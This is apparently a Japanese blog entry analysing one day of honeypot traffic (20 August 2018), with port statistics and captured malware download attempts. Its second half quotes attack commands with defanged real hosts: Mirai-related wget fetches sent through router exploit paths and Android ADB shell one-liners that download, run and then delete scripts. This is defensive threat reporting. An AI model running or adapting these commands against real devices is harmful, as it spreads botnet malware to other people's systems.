ハニーポット簡易分析(13日目:8/20)
ちょっと、前の解析となりますが、8月20日の解析結果となります。今日は頑張って、昨日分まで出来ればと思っています。
マルウェアも一部ダウンロード可能なものがあったため、時間があるときにできるとことまで、解析出来ればと思っています。
Honeytrap(2018/8/20)
検知数:6750件(0byte以上 3623件)
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,695 | 46.78% | 調査行為 |
3389 | RDP | 465 | 12.84% | 調査行為 |
1433 | Microsoft SQL Server | 71 | 1.96% | 調査行為 |
52869 | D-Link, Realtek SDK | 61 | 1.68% | マルウェアダウンロード |
22 | SSH | 53 | 1.46% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 44 | 1.21% | /conf へのアクセス |
8087 | ? | 33 | 0.91% | 調査行為 |
5094 | ? | 32 | 0.88% | 調査行為 |
161 | SNMP | 32 | 0.88% | 調査行為 |
32764 | ? | 32 | 0.88% |
調査行為 |
宛先ポートの傾向に大きな変化はありませんでした。マルウェアダウンロードについては一部のURLが調査時点では生きている状態でした。
<マルウェアダウンロード>
ポート:52869
→Mirai関連のマルウェア
POST /picsdesc.xml HTTP/1.1
・wget hxxp://159[.]65[.]232[.]56/xd.mips
・wget hxxp://107[.]191[.]99[.]41/elf.mips
・wget hxxp://80[.]211[.]112[.]150/mips
・wget hxxp://142[.]93[.]1[.]75/hoho.mips
ポート:5555
→VTに登録なし
・shell:cd /data/local/tmp;wget hxxp://207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp://207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp://207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp://207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;
・shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget hxxp://95[.]215[.]62[.]169/adbs -O -> adbs; sh adbs; rm adbs.
ポート:8081
→Mirai関連のマルウェア
POST /HNAP1/ HTTP/1.0
・wget hxxp://50[.]115[.]166[.]136/bin
ポート:37215
→Mirai関連のマルウェア
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
・wget 209[.]141[.]33[.]86
・wget hxxp://80[.]211[.]112[.]95/sensi.sh
以上、簡易分析となります。